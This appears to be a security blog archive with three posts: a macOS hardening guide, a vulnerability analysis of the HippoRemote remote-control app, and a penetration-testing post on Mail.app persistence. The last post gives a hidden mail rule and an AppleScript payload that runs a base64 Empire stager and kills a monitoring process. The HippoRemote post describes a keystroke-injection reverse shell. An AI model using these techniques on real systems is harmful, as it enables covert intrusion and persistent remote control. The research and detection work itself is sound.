Category: OSX

Securing a default installation of MacOS


This was originally written as the basis for a GIAC Gold paper.  Ultimately, it was not unique enough to warrant a research paper, but it provides an overview of the security features of MacOS.


As of mid 2016, MacOS captures nearly 10% of the global market for desktop PC software.  While Apple computers have long had the reputation of being more secure than the more popular Windows operating system, they are susceptible to many of the same attack vectors.  While MacOS comes with a number of strong security features built in, users can further improve the security of their device through configuration changes and the use of additional security software.  In this post we will explain some of the security features built into MacOS and how to configure them properly, and provide information about additional software that can improve the security posture of the system.

1.   Introduction

Security of endpoint workstations is essential.  Threats include remote exploits against running services, malware infections via the web or email, and physical attacks against the system.  By securing workstations we reduce the likelihood that sensitive data can be obtained by unauthorized third parties, and we save the time that would otherwise go into eradicating malware, restoring from backups, or reinstalling operating systems and applications (NIST, 2016).

A wide variety of threats exist against a system running MacOS.  The first category is local threats, which require physical access to the system.  Aside from physical controls, software-based controls can be used to mitigate these attacks.  Using firmware passwords and encrypting the hard drive can prevent access to the data even if the drive is removed from the system.  A physical attacker could also exploit a workstation that is left unattended and unlocked.  Passwords should be used to authenticate to a workstation, and the password should be strong (NIST, 2016).

Remote threats target services that are running on the system.  Services that do not require authentication or fail to use encryption are desirable targets for attackers.  This can be mitigated by removing unused or vulnerable services and staying up to date on security patches.  A firewall can also reduce the attack surface by rendering vulnerable services inaccessible to a remote attacker (NIST, 2016).

Malicious payloads can find their way onto a system through a number of vectors, including web browsing, email, and removable media.  By using low-privileged accounts for daily work, we can reduce the damage from a malware infection.  Anti-virus can quarantine known malicious payloads before they are given the opportunity to execute (NIST, 2016).

This paper provides information on securing an installation of MacOS.  By implementing these recommendations users will be able to better secure their own systems and the systems within their respective organizations.  While each environment will have unique requirements, this should serve as a guideline.  Some of these suggestions may remove functionality that is desired or required; the acceptable tradeoff between security and functionality is for the reader to determine.

2.   Built-in Security Controls

2.1.      Software Updates

With the release of MacOS Sierra, Apple brought in a number of new security updates.  Apple helps users keep up to date by sending notifications whenever new updates are available; they can be downloaded with the click of a button.  This helps users quickly bring their software up to the latest version.

To configure the App Store to check for updates automatically, go to System Preferences, click on App Store, and ensure that “Automatically check for updates” is selected.

It is important to patch quickly.  After a vulnerability is discovered, it is usually patched quickly, but this does no good if the patch is not applied.  Public exploits often become available shortly after a patch is released (Levin, 2016).

2.2.      Gatekeeper

Gatekeeper was first introduced in OS X Lion and used to enforce code signing, which reduces the likelihood of an application containing malware.  By default, MacOS will only run applications downloaded from the Mac App Store and applications which are signed with a valid developer ID.  It can also be configured to only allow applications from the App Store, or alternatively to allow unsigned applications (NIST, 2016).

2.3.      XProtect

Apple’s built-in anti-malware protection is known as XProtect.  It first became available in OS X Snow Leopard.  It works by comparing a downloaded application against known malware signatures; the definitions are updated silently and the feature is enabled by default.  When an application is downloaded by a quarantine-aware application such as a web browser or an instant messenger, a quarantine bit is set, and the quarantined file is compared against the list of malware definitions in /System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/XProtect.plist.  If there is a match, you will receive a warning message.  XProtect doesn’t contain any advanced heuristics, but it should be left on as it protects against common strains of malware (Hoffman, 2015).

2.4.      FileVault

MacOS also comes with an encryption utility called FileVault. Since OS X Lion, the utility allows for full disk encryption. It can also be used to encrypt removable drives as well as Time Machine back-ups.

FileVault has no noticeable effect on performance.  If the device is ever compromised, it renders the data on the system inaccessible.  Apple explains this in their FileVault Best Practices whitepaper, “All computers have firmware of some type—EFI, BIOS—to help in the discovery of hardware components and ultimately to properly bootstrap the computer using the desired OS instance. In the case of Apple hardware and the use of EFI, Apple stores relevant information within EFI to aid in the functionality of OS X. For example, the FileVault key is stored in EFI to transparently come out of standby mode.” (Apple, 2012)

The decryption key could be recovered if the system is left in standby mode.  During standby the key resides in memory, and if the RAM were dumped the key could be extracted.  The key can be destroyed on entering standby to mitigate this attack vector.  One option is to enforce hibernation, which evicts the FileVault keys from memory.  You can also have them removed in standby mode using the pmset utility with the following command (it must be run as root):

sudo pmset -a destroyfvkeyonstandby 1

2.5.      Firewall

MacOS also comes with a built-in firewall, which is not enabled by default.  MacOS does not ship with many listening services.  With the firewall enabled, users can block all incoming connections or allow incoming connections on a per-app basis; by default, signed applications are able to receive incoming connections.  There is also an option for “stealth mode”, which ignores ICMP packets and does not respond to them (Hoffman, 2014).  It is recommended to block incoming connections unless there is a service running on the system that requires them.

2.6.      Keychain

MacOS also has built-in features for password management.  The primary way MacOS manages passwords is through the Keychain, an app that can store passwords as well as account information.  The Keychain can also be used to manage the certificates that validate websites, digital documents, and other web-based material (Apple, 2016).  The keychain password is typically the same as the login password, but can be set to a different one.  To reduce the likelihood of the keychain password being compromised, it should be set to something other than your login password.  By default, the keychain will not lock when your computer goes to sleep.  You can use the Keychain Access utility to make the keychain lock when sleeping and after a set number of minutes of inactivity (NIST, 2016).

2.7.      Sandboxing

Apple enforces sandboxing on applications that come from the Mac App Store.  This helps mitigate the effects of software flaws within apps that could otherwise compromise the host system.  While this reduces the functionality of certain apps (Martin, 2011), it offers tremendous security gains.  It is also possible to force any application to run in a sandbox using the sandbox-exec tool (Prandzioch, 2016).  To sandbox applications other than those from the App Store, I recommend the profiles at https://github.com/pansen/macos-sandbox-profiles.  While sandboxing is not always 100% effective (Core Security, 2011), it can reduce the harm from an exploited application.

2.8.      System Integrity Protection

Another security feature that first came to the Mac with OS X El Capitan is SIP (System Integrity Protection).  SIP, sometimes referred to as “rootless”, helps prevent potentially malicious software from modifying protected files by restricting the permissions of the root user account.  With SIP in place, only processes signed by Apple can modify these protected areas.  There are few good reasons to disable SIP and it is highly recommended to leave it on (Apple, 2016).

3.   Configuration

3.1.      User Account Management

MacOS allows users to log in automatically during start-up.  This should not be used.  If you enable automatic login, the keychain password is stored in /etc/kcpassword XOR’d with a known key, allowing anyone with access to the machine to recover the plaintext password (StackExchange, 2012).

On a fresh installation of MacOS, the first user account created is an administrative account.  Administrative users are members of the admin group and have sudo permissions, enabling them to control other user accounts, including root.  Apple recommends the following when creating user accounts: “to reduce exposure to harmful apps or files, limit the number of administrator users you create. Consider creating a standard user for your daily work and use the administrator user only when you need to install software or administer users.” (Apple, 2016)

Apple also allows users to create a guest user, so that friends and family can use the system without a password and without gaining access to the owner’s files.  This can be helpful, but it creates a certain level of risk: if there is an unpatched local privilege escalation vulnerability in MacOS, it may be exploitable from the guest account.  For this reason the guest account should be disabled unless explicitly needed (NIST, 2016).

3.2.      Firmware Password

Enabling a firmware password can increase the security level of a MacOS system.  Firmware passwords are set in the logic board’s firmware.  It is an EFI password that can keep the Mac from being booted from an external boot volume or into single-user mode.  In the past, firmware passwords could usually be bypassed by removing the memory, but this is no longer the case (Tanasi, 2017).  The firmware password can also prevent direct memory access via interfaces like FireWire.  The firmware password stays with the host system, so removing the drive and bringing it to another system would not remove the password (Apple, 2012).  While this is a strong control, it is not immune from all attacks.  In 2016 a security researcher discovered a way to bypass some implementations by re-flashing the chip (osxreverser, 2016).  This does not recover the password, but would still grant access.  The only approved way to remove the firmware password without knowing it is to take the system to an Apple retail store or an Apple authorized service provider (Apple, 2016).

3.3.      Bonjour

Bonjour is the name for Apple’s implementation of zero-configuration networking.  It is used for service discovery, address assignment, and hostname resolution.  Because Bonjour advertises all of the system’s capabilities, it tells attackers what type of software is running on the system (Tanasi, 2016).  In a paper presented at the 2016 IEEE Symposium on Security and Privacy, a group of researchers identified a number of Apple services built on zero-configuration frameworks, such as Apple Handoff and AirDrop, whose implementations lack security.  Because the zero-configuration protocol has no means to validate identity, any service relying on it is vulnerable to MITM (Man in the Middle) attacks.  This would allow an attacker on the same network segment to intercept files being transferred (Bai, 2016).

3.4.      Disable sharing

On a new MacOS system, all sharing is disabled by default, which is the most secure state.  If sharing is necessary, certain precautions should be taken.

3.4.1.   Screen Sharing and Remote Management

These two services allow remote control of the system, similar to popular screen sharing applications based on VNC.  Typically the only time this is needed is for remote support.  If it is needed, ensure that authentication is used with a strong password, and disable the service when not in use (NIST, 2016).

3.4.2.   Remote Login

Remote Login controls access to both SSH and SFTP.  The protocols themselves are relatively secure, but unless needed, they should remain disabled.  For additional security, SSH can be configured to only allow key-based authentication by editing /etc/ssh_config and setting the following values (stackexchange, 2017):

PermitRootLogin no
PasswordAuthentication no
PermitEmptyPasswords no
ChallengeResponseAuthentication no
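The settings from sections 2 and 3 can be verified in one pass.  The script below is an added example, not the paper’s own code: each check runs the macOS tool named in its comment (fdesetup, csrutil, spctl, socketfilterfw, pmset, systemsetup, defaults) and interprets the output with a small parser, so the parsers can be exercised with constructed output.  Note that the four SSH directives above are sshd (server) directives, so the script reads them from sshd_config; the path /etc/ssh/sshd_config and the firewall state values are my assumptions.

```python
"""Audit of the MacOS settings discussed above (added example, not the paper's own
code). Each check runs the macOS tool named in the CHECKS table and hands its
output to a small parser, so the parsers can be tested with constructed output.
Run with sudo on a Mac for the full set; most checks fail on other platforms."""
import re
import subprocess

SFW = "/usr/libexec/ApplicationFirewall/socketfilterfw"
LOGINWINDOW = "/Library/Preferences/com.apple.loginwindow"

def says_enabled(out):
    # `csrutil status` prints "System Integrity Protection status: enabled.",
    # `socketfilterfw --getstealthmode` prints "Stealth mode enabled"/"disabled"
    low = out.lower()
    return "enabled" in low and "disabled" not in low

def parse_filevault(out):
    # `fdesetup status` prints "FileVault is On." or "FileVault is Off."
    return "FileVault is On" in out

def parse_gatekeeper(out):
    # `spctl --status` prints "assessments enabled" or "assessments disabled"
    return out.strip().startswith("assessments enabled")

def parse_firewall(out):
    # `socketfilterfw --getglobalstate`: "(State = 0)" off, 1 on, 2 block all incoming
    return re.search(r"State = [12]", out) is not None

def parse_destroy_fv_key(out):
    # `pmset -g` lists "DestroyFVKeyOnStandby 1" once the setting from 2.4 is applied
    m = re.search(r"DestroyFVKeyOnStandby\s+(\d)", out)
    return m is not None and m.group(1) == "1"

def parse_remote_login(out):
    # `systemsetup -getremotelogin` prints "Remote Login: On" or "Remote Login: Off"
    return "Remote Login: Off" in out

def key_unset_or_zero(out):
    # `defaults read <domain> <key>` prints the value, or an error containing
    # "does not exist" when the key is absent (the secure default for both keys).
    # Empty output (tool missing) is treated as a failed check, not a pass.
    s = out.strip()
    return s == "0" or "does not exist" in s

def check_sshd_config(text):
    """Return the directives from 3.4.2 that are missing or not set to "no".
    They are sshd directives, so they are read from the server file sshd_config
    (on current macOS /etc/ssh/sshd_config), not from the client's ssh_config."""
    wanted = {"PermitRootLogin": "no", "PasswordAuthentication": "no",
              "PermitEmptyPasswords": "no", "ChallengeResponseAuthentication": "no"}
    seen = {}
    for line in text.splitlines():
        parts = line.split("#", 1)[0].split(None, 1)
        if len(parts) == 2 and parts[0] in wanted and parts[0] not in seen:
            seen[parts[0]] = parts[1].strip().lower()  # sshd keeps the first value
    return sorted(k for k, v in wanted.items() if seen.get(k) != v)

# Constructed sample (not from the paper): one directive missing, one set to yes.
SAMPLE_SSHD_CONFIG = """\
PermitRootLogin no
#PasswordAuthentication no
PasswordAuthentication yes
PermitEmptyPasswords no
"""

CHECKS = [
    ("FileVault on", ["fdesetup", "status"], parse_filevault),
    ("SIP enabled", ["csrutil", "status"], says_enabled),
    ("Gatekeeper enabled", ["spctl", "--status"], parse_gatekeeper),
    ("Firewall enabled", [SFW, "--getglobalstate"], parse_firewall),
    ("Stealth mode enabled", [SFW, "--getstealthmode"], says_enabled),
    ("FileVault key destroyed on standby", ["pmset", "-g"], parse_destroy_fv_key),
    ("Remote Login (SSH) off", ["systemsetup", "-getremotelogin"], parse_remote_login),
    ("Guest account off", ["defaults", "read", LOGINWINDOW, "GuestEnabled"], key_unset_or_zero),
    ("Automatic login off", ["defaults", "read", LOGINWINDOW, "autoLoginUser"], key_unset_or_zero),
]

def run(argv):
    """Run a tool and return stdout plus stderr, or "" if it is not installed."""
    try:
        p = subprocess.run(argv, capture_output=True, text=True)
    except OSError:
        return ""
    return p.stdout + p.stderr

def audit(sshd_config_path="/etc/ssh/sshd_config"):
    """Return {check name: passed} for every check plus the sshd config review."""
    results = {name: parser(run(argv)) for name, argv, parser in CHECKS}
    try:
        with open(sshd_config_path) as f:
            results["sshd_config hardened"] = check_sshd_config(f.read()) == []
    except OSError:
        results["sshd_config hardened"] = False
    return results

if __name__ == "__main__":
    for name, ok in audit().items():
        print(("PASS  " if ok else "FAIL  ") + name)
```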


References

American Psychological Association. (2010). APA Manual (Publication manual of the American Psychological Association) (6th ed.). Washington, DC: American Psychological Association.

Citefast, Citefast automatically formats citations: APA 6th edition, MLA 7th ed. and Chicago 16th ed. (n.d.). Retrieved July 29, 2014, from http://www.citefast.com/

Strunk, W., & White, E. B. (1999). The elements of style. Boston: Allyn and Bacon.

About System Integrity Protection on your Mac. (2016, November 07). Retrieved January 14, 2017, from https://support.apple.com/en-us/HT204899

Osxreverser. (2016, June 25). Apple EFI firmware passwords and the SCBO myth. Retrieved January 14, 2017, from https://reverse.put.as/2016/06/25/apple-efi-firmware-passwords-and-the-scbo-myth/

Apple OS X Sandbox Predefined Profiles Bypass. (2011, November 10). Retrieved January 14, 2017, from https://www.coresecurity.com/content/apple-osx-sandbox-bypass

Atlas, K. (2016, October 06). OS X Config Check. Retrieved January 14, 2017, from https://github.com/kristovatlas/osx-config-check

Badger, L., Souppaya, M., Trapnell, M., Trapnell, E., Yaga, D., & Scarfone, K. (2016). Guide to securing Apple OS X 10.10 systems for IT professionals: a NIST security configuration checklist. NIST Special Publication (SP) 800 -179. doi:10.6028/nist.sp.800-179

Bai, X., Xing, L., Zhang, N., Wang, X., Liao, X., Li, T., & Hu, S. (2016). Staying Secure and Unprepared: Understanding and Mitigating the Security Risks of Apple ZeroConf. 2016 IEEE Symposium on Security and Privacy (SP). doi:10.1109/sp.2016.45

Best Practices for Deploying FileVault 2. (2012). Apple Technical White Paper. Retrieved January 14, 2017, from http://training.apple.com/pdf/WP_FileVault2.pdf

Bookwalter, J. (2016, November 22). Radio Silence 2 review: Set it and forget it Mac firewall for outgoing connections. Retrieved January 14, 2017, from http://www.macworld.com/article/3143072/security/radio-silence-2-review-set-it-and-forget-it-mac-firewall-for-outgoing-connections.html

Desktop OS market share 2012-2016. (n.d.). Retrieved January 14, 2017, from https://www.statista.com/statistics/218089/global-market-share-of-windows-7/

Does activating auto-login compromise secure password storage? (2012, May 7). Retrieved January 14, 2017, from http://apple.stackexchange.com/questions/50652/does-activating-auto-login-compromise-secure-password-storage

Hands Off! (n.d.). Retrieved January 14, 2017, from https://www.oneperiodic.com/products/handsoff/

Hoffman, C. (2014, December 20). Your Mac’s Firewall is Off By Default: Do You Need to Enable It? Retrieved January 14, 2017, from http://www.howtogeek.com/205108/your-mac%E2%80%99s-firewall-is-off-by-default-do-you-need-to-enable-it/

Hoffman, C. (2015, May 18). XProtect Explained: How Your Mac’s Built-in Anti-malware Software Works. Retrieved January 14, 2017, from http://www.howtogeek.com/217043/xprotect-explained-how-your-macs-built-in-anti-malware-works/

How to use SSH keys and disable password authentication (2016, Jan 27). Retrieved January 22 2017, from http://apple.stackexchange.com/questions/225231/how-to-use-ssh-keys-and-disable-password-authentication

Kessler, T. (2014, December 17). The four Mac security options everyone should know. Retrieved January 14, 2017, from http://www.macworld.com/article/2855020/the-four-mac-security-options-everyone-should-know.html

Keychain Access: Keychain Access overview. (2016, May 4). Retrieved January 14, 2017, from https://support.apple.com/kb/PH20093?locale=en_US

Levin, J. (2016). MacOS and iOS Internals (Vol. 3, Security & Insecurity ). New York, NY: Technologeeks Press.

MacOS Security and Privacy Guide. (2017, January 02). Retrieved January 14, 2017, from https://github.com/drduh/macOS-Security-and-Privacy-Guide

Martin, D. W. (2011, November 7). OS X Lion Sandboxing Is A Killjoy Destined To Ruin Our Mac Experience. Retrieved January 14, 2017, from http://www.cultofmac.com/113977/os-x-lion-sandboxing-is-a-killjoy-destined-to-ruin-our-mac-experience/

Norvell, P. (2002). Improving the Security of a Default Install of Mac OS X. SANS Institute InfoSec Reading Room. Retrieved January 14, 2017, from https://www.sans.org/reading-room/whitepapers/apple/improving-security-default-install-mac-os-v101-240.

Piper, S. (2016, September 11). OS X Lockdown. Retrieved January 14, 2017, from https://github.com/SummitRoute/osxlockdown

Prandzioch, D. (2016, April 11). OS X: Run any command in a sandbox. Retrieved January 14, 2017, from https://www.davd.eu/os-x-run-any-command-in-a-sandbox/

Set your Mac to automatically log in during startup. (2016, December 06). Retrieved January 14, 2017, from https://support.apple.com/en-us/HT201476

Singh, S. (2013, August 30). Mac OSX-STIG. Retrieved January 14, 2017, from https://github.com/find-evil/Mac-OSX-STIG

Tanasi, A. (2016). MacOS 10.12 Sierra. Retrieved January 14, 2017, from http://docs.hardentheworld.org/OS/MacOS_10.12_Sierra/index.html

Use a firmware password on your Mac. (2016, March 22). Retrieved January 14, 2017, from https://support.apple.com/en-us/HT204455

Wardle, P. (2015). BlockBlock. Retrieved January 14, 2017, from https://objective-see.com/products/blockblock.html

Ways to avoid harmful software. (2016). Retrieved January 14, 2017, from https://help.apple.com/machelp/mac/10.12/index.html#/mh11389


Control your Mac with an iPhone app – An analysis of HippoRemote


Applications in use on Macs are often under less scrutiny for security than their Windows alternatives.  When researching popular apps in use on OS X I found an app on the iPhone called HippoRemote.  It appears to be quite popular, with a combined 7,558 reviews on the iTunes store for both the LITE and Pro versions.  It has also been featured heavily on tech blogs such as Mashable, Lifehacker, Cult of Mac, Macworld, and many more.  The software allows you to use your phone as a wireless trackpad and keyboard.  A cursory review of their website shows that it is actually cross-platform: it is available for Mac, Windows, and Linux.  The Pro edition boasts various features such as a Login Manager that allows you to “Securely store your passwords and sign into websites with a single tap.”

Before going into the Mac version, I’m going to spend some time on the Windows version.  The software was downloaded from the website and the 7-Zip self-extracting archive was run.  The extracted application is called “HippoVNC”, and checking the About menu shows that HippoVNC is forked from UltraVNC.  For those of you who have been doing security for a while, you may already be aware of some of the security concerns with VNC.  The first half of this article addresses those.

VNC typically stores the VNC password in either the registry or an .ini configuration file.  Since HippoVNC is based on UltraVNC, it stores it in a config file.  This is important, because the confidentiality of this password now depends on the NTFS permissions on the host.  In some cases this could be fine; however, if the HippoVNC software was extracted into an area accessible to other users, the config file could be read by them.  The password in the config file is encrypted, but to little effect.  It is only encrypted with DES, a weak and deprecated algorithm.  Even with encryption it is effectively plaintext, as the key with which all VNC passwords are encrypted is within the VNC source code:

{23, 82, 107, 6, 35, 78, 88, 7}

The other issues with VNC become more apparent when you analyze the packets on the wire.  Below is a screenshot of a “Follow TCP Stream” in Wireshark.

TCP stream of VNC authentication and keyboard commands

The authentication handshake also uses DES.  The keystrokes are visible in ASCII hex.  Tools like Cain and Abel by oxid.it and PHoss by phenoelit.de, which have been around for quite some time, are able to sniff this handshake and crack it.

One of the tools for abusing the plaintext nature of VNC keystrokes is VNC keylogger by Jon Oberheide.  It allows you to see keystrokes sent in real time, given the ability to sniff traffic between the client and server.  Keyboard-emulating hardware such as the USB Rubber Ducky by Hak5 and similar products works by injecting keystrokes to perform actions such as opening a command shell and executing a payload.  I thought to translate this concept over to VNC to inject keystrokes and spawn a shell.  Further research showed that this idea had been explored before: a Metasploit module had been created last year for this very purpose.

Looking into the Linux documentation reveals that it works with the existing VNC server that comes with whichever version of Linux you are running; there is no software to download.  With that said, it’s time to turn our attention to MacOS (OS X).

For OS X Leopard (10.5) and Tiger (10.4) the instructions say to use Apple’s built-in Screen Sharing utility, which is based on VNC.  Apple Remote Desktop (ARD) is a tremendous security improvement over other VNC variants.  Version 2, released in 2004, encrypted all keyboard and mouse input.  ARD version 3 encrypts all traffic including desktop graphics and file transfers.

The instructions for Leopard (10.6) and beyond recommend downloading and running an app called “HippoConnect”.  It boasts additional features which are unavailable using the screen sharing method.  After downloading and running the application, the user sets a password of up to eight characters and the set-up is complete.

I became interested in where the application stored the password, as well as how the application would continue to run through reboots.  To little surprise, they use Apple’s preferred method, LaunchDaemons and LaunchAgents.  The information is stored in a .plist file, which is similar to XML.

HippoConnect .plist file contents

There are a couple alarming things here:

  • The password is stored in plain text as a program argument
  • The .plist file is world-readable
  • The program is executed with root privileges

The security implications are that on a multi-user system, any unprivileged account can find the password to remotely control the screen of any user, since the HippoConnectAgent runs on boot.  Any exploit of the HippoConnectAgent listener could result in gaining root privileges remotely.

Wireshark was used to evaluate how the HippoConnect protocol worked.  As it turns out, it is quite similar to VNC.

TCP Stream of HippoConnect

As you can see from the screenshot, it authenticates using VNC authentication: a challenge value is sent to be encrypted with the secret DES key, and the encrypted value is returned as the response.  Seeing this, I wanted to replicate the attacks available against the VNC protocol for HippoConnect.

The first hiccup I ran into was getting the challenge to encrypt properly.  No matter how many times I tried encrypting the challenge with the key, I never got the proper response.  I looked at the RFC for the Remote Framebuffer Protocol (RFB), which states:

The client encrypts the challenge with DES, using a password supplied
by the user as the key.  To form the key, the password is truncated
to eight characters, or padded with null bytes on the right.  The
client then sends the resulting 16-byte response.

As it turns out, this doesn’t tell the whole picture.  After some more research I stumbled across this post, which details the missing information:

The actual software encrypts the challenge with all the bit fields
in each byte of the password mirrored.

With this knowledge, the VNC authentication handshake could now be replicated.

I wrote a Python script, which I have dubbed “AngryHippo”, that can be used for exploiting these security issues.

Here is a quick video of the sniffer module in use.  As you can see, the challenge and response values are printed to the screen, along with the status of the current keypress.

Sniffing Demo

Watch in HD https://vimeo.com/198123065

When you sniff the handshake, you can pass it to the cracking module to recover the plaintext key.  When running against the rockyou.txt wordlist, which has about 14 million words, I was able to exhaust the list in 5 minutes on my MacBook Pro.  If you require a complete brute force of the entire 8 character keyspace, I would suggest using one of the VNC crackers written in another programming language.  Below is a simple demonstration of the cracking module using a small wordlist.

Cracking Demo

Watch in HD https://vimeo.com/198123111

Lastly, I created a module for keystroke injection.  Currently the payload used is a simple bash reverse shell, for which you provide your listener’s IP and port.  An option is available to control the speed of the commands, which will likely be limited by the speed of the computer you are attacking.  Using a MacBook Pro as the target, the speed was set to one millisecond per keystroke, and I was able to inject keystrokes to spawn a reverse shell in a fraction of a second.

Injection Demo (Fast)

Watch in HD https://vimeo.com/198002869

In case that demonstration moved too quickly, here is a slowed down version injecting at a tenth of a second per keystroke:

Injection Demo (Slow)

Watch in HD https://vimeo.com/198003039

If you are curious whether anyone is running the HippoConnect agent on your network, it is advertised over multicast DNS via Bonjour, Apple’s zero-configuration protocol.  It listens on port 41660.

Bonjour Browser and Wireshark

AngryHippo can be downloaded at: https://github.com/n00py/AngryHippo


Using email for persistence on OS X

Mail Icon

In this post we will cover how Mail.app on OS X can be used for persistence.  I was inspired by similar tools designed to work with Microsoft Outlook: I first stumbled upon this article from MWR InfoSecurity, and then this blog post from Silent Break Security.  While rules in Mail.app will not replicate across the directory domain, which is one of the awesome things about both XRulez and Ruler, the technique has some distinct advantages over other methods of persistence:

  • It does not present a network signature until remotely activated
  • It is not detected by persistence-enumeration tools such as KnockKnock

It’s not uncommon for a target network to be under 24/7 monitoring.  Most methods of persistence require the malware to constantly beacon back to the command and control server, which often presents a distinctive network signature that can be discovered by a savvy analyst.  A security-minded user or organization may also be enumerating common persistence locations for malware, which typically include LaunchDaemons, cron jobs, and kernel extensions.

KnockKnock

KnockKnock being ran on a system

While this technique will leave artifacts on the host, the fact that common security tools cannot detect it is a plus.

To create a mail rule the standard way, go to Mail -> Preferences -> Rules -> Add Rule.

For penetration testing, however, we cannot assume that we will be able to interact with the GUI, so we need a way to do this from a shell.

Mail rules are stored in:
/Users/$USER/Library/Mail/$VERSION/MailData/SyncedRules.plist
where $USER is the name of the user’s home directory and $VERSION depends on the OS release: MacOS Sierra (10.12) uses V4, OS X El Capitan (10.11) uses V3, and anything from OS X Lion (10.7) to OS X Yosemite (10.10) uses V2.

If the user has iCloud syncing enabled, the rule will be overwritten by a different file, located at:
/Users/$USER/Library/Mobile Documents/com~apple~mail/Data/$VERSION/MailData/SyncedRules.plist
This file always takes precedence and overwrites the file under /Library/Mail/, so in that case you should add your rule to this file instead.  While iCloud syncing happens automatically, Mail.app needs to be bounced (restarted) to pick up the new rule when the default location is in use.

There is another important caveat: mail rules are not active unless they are enabled in RulesActiveState.plist, which is in the same directory.

Here is the anatomy of an acceptable rule for what we are trying to do:

<dict>
<key>AllCriteriaMustBeSatisfied</key>
<string>NO</string>
<key>AppleScript</key>
<string>EVIL.scpt</string>
<key>AutoResponseType</key>
<integer>0</integer>
<key>Criteria</key>
<array>
<dict>
<key>CriterionUniqueId</key>
<string>9709BE75-9606-D470-4F04-0A884724105A</string>
<key>Expression</key>
<string>TriggerWord</string>
<key>Header</key>
<string>Subject</string>
</dict>
</array>
<key>Deletes</key>
<string>YES</string>
<key>HighlightTextUsingColor</key>
<string>NO</string>
<key>MarkFlagged</key>
<string>NO</string>
<key>MarkRead</key>
<string>NO</string>
<key>NotifyUser</key>
<string>NO</string>
<key>RuleId</key>
<string>0A08B01B-4DAF-FA3A-E81D-CBA86A0E7C84</string>
<key>RuleName</key>
<string>Spam Filter</string>
<key>SendNotification</key>
<string>NO</string>
<key>ShouldCopyMessage</key>
<string>NO</string>
<key>ShouldTransferMessage</key>
<string>NO</string>
<key>TimeStamp</key>
<integer>147762204</integer>
<key>Version</key>
<integer>1</integer>
</dict>

The notable fields are:

  • AppleScript – This identifies that an AppleScript should be run, and the string identifies the payload
  • CriterionUniqueId and RuleId – Unique identifiers for the rule.  The RuleId for this rule will need to be activated in RulesActiveState.plist
  • Expression – This is the string that our rule will look for when choosing to fire
  • RuleName – This is the name of the rule.  To avoid detection, it should be named something innocuous
  • Deletes – This deletes the email when the criteria are matched

To activate the rule, just include the Rule ID in the RulesActiveState.plist file as such:

<key>0A08B01B-4DAF-FA3A-E81D-CBA86A0E7C84</key>
<true/>
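From the defender’s side, the same two files are all that is needed to find rules of this kind.  The script below is an added example, not the post’s code: it parses SyncedRules.plist and RulesActiveState.plist with plistlib, reports every rule whose action names an AppleScript, and says whether the rule is enabled and what triggers it.  The sample plists are constructed from the rule layout shown above, and the assumption that SyncedRules.plist holds an array of rule dicts is mine.

```python
"""Added example (not from the post): a defender-side check that lists the Mail.app
rules whose action runs an AppleScript, which of them are enabled in
RulesActiveState.plist, and what triggers them. Only plistlib is used. The sample
plists are constructed from the rule layout shown above; the assumption that
SyncedRules.plist holds an array of rule dicts is mine, not the post's."""
import glob
import os
import plistlib

# Constructed sample: one AppleScript rule (as in the post) and one ordinary rule
# that also names a script but is not enabled.
SAMPLE_SYNCED_RULES = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><array>
<dict>
 <key>AppleScript</key><string>EVIL.scpt</string>
 <key>Criteria</key><array><dict>
   <key>Expression</key><string>TriggerWord</string>
   <key>Header</key><string>Subject</string>
 </dict></array>
 <key>Deletes</key><string>YES</string>
 <key>RuleId</key><string>0A08B01B-4DAF-FA3A-E81D-CBA86A0E7C84</string>
 <key>RuleName</key><string>Spam Filter</string>
</dict>
<dict>
 <key>AppleScript</key><string>Report.scpt</string>
 <key>Criteria</key><array><dict>
   <key>Expression</key><string>newsletter</string>
   <key>Header</key><string>From</string>
 </dict></array>
 <key>RuleId</key><string>11111111-2222-3333-4444-555555555555</string>
 <key>RuleName</key><string>Newsletters</string>
</dict>
</array></plist>
"""

SAMPLE_ACTIVE_STATE = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
 <key>0A08B01B-4DAF-FA3A-E81D-CBA86A0E7C84</key><true/>
 <key>11111111-2222-3333-4444-555555555555</key><false/>
</dict></plist>
"""

def script_rules(synced_rules, active_state):
    """Return one finding per rule that names an AppleScript payload."""
    rules = plistlib.loads(synced_rules)
    if isinstance(rules, dict):  # tolerate a file holding a single rule dict
        rules = [rules]
    active = plistlib.loads(active_state)
    findings = []
    for rule in rules:
        script = rule.get("AppleScript")
        if not script:
            continue  # ordinary filing/flagging rules are not of interest here
        rule_id = rule.get("RuleId", "")
        findings.append({
            "name": rule.get("RuleName", ""),
            "id": rule_id,
            "script": script,
            # a rule only fires if its RuleId is <true/> in RulesActiveState.plist
            "active": bool(active.get(rule_id, False)),
            # Deletes=YES hides the triggering mail, as the post's rule does
            "deletes": rule.get("Deletes") == "YES",
            "triggers": ["%s contains %r" % (c.get("Header", "?"), c.get("Expression", ""))
                         for c in rule.get("Criteria", [])],
        })
    return findings

def rule_dirs(home=None):
    """Both locations the post names: local Mail data and the iCloud copy that wins."""
    home = home or os.path.expanduser("~")
    patterns = [os.path.join(home, "Library/Mail/V*/MailData"),
                os.path.join(home, "Library/Mobile Documents/com~apple~mail/Data/V*/MailData")]
    return sorted(d for p in patterns for d in glob.glob(p))

def scan(home=None):
    """Scan a user's Mail data and return all AppleScript rules with their location."""
    findings = []
    for d in rule_dirs(home):
        try:
            with open(os.path.join(d, "SyncedRules.plist"), "rb") as f:
                synced = f.read()
            with open(os.path.join(d, "RulesActiveState.plist"), "rb") as f:
                active = f.read()
        except OSError:
            continue
        for finding in script_rules(synced, active):
            finding["location"] = d
            findings.append(finding)
    return findings

if __name__ == "__main__":
    for f in scan():
        state = "ACTIVE" if f["active"] else "inactive"
        print("%s rule %r runs %s when %s (%s)" % (
            state, f["name"], f["script"], " or ".join(f["triggers"]), f["location"]))
```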

Now that rule creating is covered it is time to talk about the payload.  Payloads are created in AppleScript.  Here is a sample payload:

do shell script "echo \"import sys,base64;exec(base64.b64decode('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'));\" 
| python & kill `ps -ax | grep ScriptMonitor |grep -v grep |  awk '{print $1}'`"

AppleScript can issue commands as you would in the terminal by using “do shell script”.  The second portion is a typical Empire stager.  The additional commands after the ampersand hide the AppleScript: without them, the payload is visible not only in Activity Monitor, but also as an animated spinning-gear icon in the menu bar.

I’ve created an Empire module that you can use with Empire 2.0 to accomplish all of this automatically.  My original proof of concept script also exists to run manually in which you specify your own parameters and payload.  I highly recommend giving the Empire module a whirl.

Steps to use this module with Empire after gaining an initial session:

